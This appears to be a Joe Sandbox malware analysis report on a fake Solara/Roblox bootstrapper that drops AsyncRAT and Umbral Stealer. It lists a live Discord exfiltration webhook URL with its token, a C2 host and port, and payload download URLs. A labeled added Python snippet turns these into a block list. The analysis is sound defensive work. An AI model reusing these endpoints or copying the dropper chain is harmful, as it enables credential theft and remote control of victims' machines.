Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr

                    Networking

                    barindex
                    Source: Malware configuration extractor | URLs: 127.0.0.1
                    Source: Malware configuration extractor | URLs: 23.ip.gl.ply.gg
                    Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o
                    Source: global traffic | TCP traffic: 192.168.2.7:49989 -> 147.185.221.23:26848
                    Source: global traffic | HTTP traffic detected: GET /asset/discord.json HTTP/1.1; Host: getsolara.dev; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1; Host: getsolara.dev
                    Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1; Host: clientsettings.roblox.com; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1; Host: www.nodejs.org; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 208.95.112.1
                    Source: Joe Sandbox View | IP Address: 128.116.123.3
                    Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | DNS query: name: ip-api.com
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 104.21.93.27:443
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: getsolara.dev
                    Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                    Source: global traffic | DNS traffic detected: DNS query: clientsettings.roblox.com
                    Source: global traffic | DNS traffic detected: DNS query: www.nodejs.org
                    Source: global traffic | DNS traffic detected: DNS query: 23.ip.gl.ply.gg
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:64632
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://clientsettings.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsP
                    Source: powershell.exe, 0000001E.00000002.1802454253.000001F4EE624000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edge-term4-fra2.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://getsolara.dev
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gstatic.com
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD85B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                    Source: BootstrapperV1.23.exe.0.dr | String found in binary or memory: http://james.newtonking.com/projects/json
                    Source: powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2478752394.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: Amcache.hve.23.dr | String found in binary or memory: http://upx.sf.net
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000010.00000002.1355528661.000001E67BB20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.nodejs.org
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
                    Source: Injector.exe.0.dr | String found in binary or memory: https://discord.com/api/v10/users/
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165S
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getsolara.dev
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://getsolara.dev/api/endpoint.json
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B43000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://getsolara.dev/asset/discord.json
                    Source: Injector.exe.0.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
                    Source: powershell.exe, 0000001E.00000002.1797731442.000001F4EE532000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microso
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                    Source: powershell.exe, 0000001C.00000002.1607943237.00000195AC969000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5vn
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ncs.roblox.com/upload
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                    Source: powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://pastebin.com/raw/pjseRvyK
                    Source: BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nodejs.org
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49703 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.7:49706 version: TLS 1.2
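The Networking findings above are easiest to act on once they are pulled into a structured indicator list. The following Python is an added example, not Joe Sandbox tooling and not part of this report: it parses the line formats this section uses (configuration-extractor URLs, TCP connections, HTTP requests, DNS queries) and separates the entries that the report's own "Malware configuration extractor" attributes to the sample (the Discord webhook, the 23.ip.gl.ply.gg host) from traffic that merely occurred during the session (nodejs.org, roblox.com, ip-api.com). The sample lines are copied from this report; most are in the run-together form the text extract produces, one has a " | " separator restored, and the parser accepts both. Treating loopback and private addresses as not worth blocking is the example's own assumption.

```python
"""Turn Joe Sandbox 'Networking' lines into a structured indicator list.

Added example, not Joe Sandbox code. Accepts both the run-together text-extract
form ("...extractorURLs: ...", "HTTP/1.1Host: ...") and lines with " | " and
"; " separators restored.
"""
import ipaddress
import re

# Constructed sample: lines copied from the Networking section of this report.
SAMPLE_LINES = [
    "Source: Malware configuration extractorURLs: 127.0.0.1",
    "Source: Malware configuration extractorURLs: 23.ip.gl.ply.gg",
    "Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/"
    "1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o",
    "Source: global trafficTCP traffic: 192.168.2.7:49989 -> 147.185.221.23:26848",
    "Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive",
    "Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1; Host: getsolara.dev",
    "Source: unknownDNS query: name: ip-api.com",
    "Source: global trafficDNS traffic detected: DNS query: 23.ip.gl.ply.gg",
]

CONFIG_PREFIX = "Source: Malware configuration extractor"
URL_RE = re.compile(r"URLs?:\s*(\S+)")
TCP_RE = re.compile(r"TCP traffic:\s*(\S+):(\d+)\s*->\s*(\S+):(\d+)")
# Host name is taken non-greedily so a run-together "ip-api.comConnection:" still
# yields "ip-api.com".
HTTP_RE = re.compile(
    r"HTTP traffic detected:\s*([A-Z]+)\s+(\S+)\s+HTTP/[\d.]+[;\s]*"
    r"Host:\s*([A-Za-z0-9.-]+?)(?=Connection:|;|\s|$)"
)
DNS_RE = re.compile(r"DNS query:\s*(?:name:\s*)?([A-Za-z0-9.-]+)")


def _is_local(host):
    """Loopback/private addresses are not useful blocklist entries (assumption)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not an IP literal
    return ip.is_loopback or ip.is_private


def summarize(lines):
    """Return indicators keyed by kind; config-extractor entries become block_*."""
    out = {"block_hosts": [], "block_urls": [], "tcp_endpoints": [],
           "http_requests": [], "dns_names": []}
    for line in lines:
        line = line.strip()
        if line.startswith(CONFIG_PREFIX):
            m = URL_RE.search(line)
            if m is None:
                continue
            value = m.group(1)
            if "://" in value:
                out["block_urls"].append(value)   # full URL, e.g. the webhook
            elif not _is_local(value):
                out["block_hosts"].append(value)  # bare host or routable IP
        elif (m := TCP_RE.search(line)):
            out["tcp_endpoints"].append((m.group(3), int(m.group(4))))
        elif (m := HTTP_RE.search(line)):
            out["http_requests"].append((m.group(3), m.group(2)))
        elif (m := DNS_RE.search(line)):
            out["dns_names"].append(m.group(1))
    # de-duplicate while keeping report order
    return {k: list(dict.fromkeys(v)) for k, v in out.items()}


if __name__ == "__main__":
    for kind, values in summarize(SAMPLE_LINES).items():
        print(kind, values)
```

The webhook is kept as a full URL rather than reduced to discord.com, since blocking the host would not be proportionate; the TCP endpoint 147.185.221.23:26848 is reported as observed and is not tied to any DNS name by this example.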

                    Operating System Destruction

                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process information set: 01 00 00 00

                    System Summary

                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
                    Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Windows Security Host.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Code function: 0_2_00007FFAAC5B0A31
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Code function: 3_2_00007FFAAC5AA432
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Code function: 3_2_00007FFAAC5A1689
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Code function: 3_2_00007FFAAC5A9686
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Code function: 3_2_00007FFAAC5A16C9
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Code function: 3_2_00007FFAAC5A7E5D
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Code function: 4_2_00007FFAAC596DB0
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Code function: 4_2_00007FFAAC5A2540
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC58211D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC6530E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFAAC6530E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 28_2_00007FFAAC6530E9
                    Source: C:\Users\user\Windows Security Host.exe | Code function: 34_2_00007FFAAC591689
                    Source: C:\Users\user\Windows Security Host.exe | Code function: 34_2_00007FFAAC5916C9
                    Source: C:\Users\user\Windows Security Host.exe | Code function: 35_2_00007FFAAC591689
                    Source: C:\Users\user\Windows Security Host.exe | Code function: 35_2_00007FFAAC5916C9
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe 8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
                    Source: 8Hd0ZExgJz.exe, 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe, 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWindows Security Host.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe, 00000000.00000000.1231228845.00000000003DE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBootstrapperV1.23.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe | Binary or memory string: OriginalFilenameBootstrapperV1.23.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                    Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\Windows Security Host.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                    Source: 8Hd0ZExgJz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.0.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.cs | Cryptographic APIs: 'TransformFinalBlock'
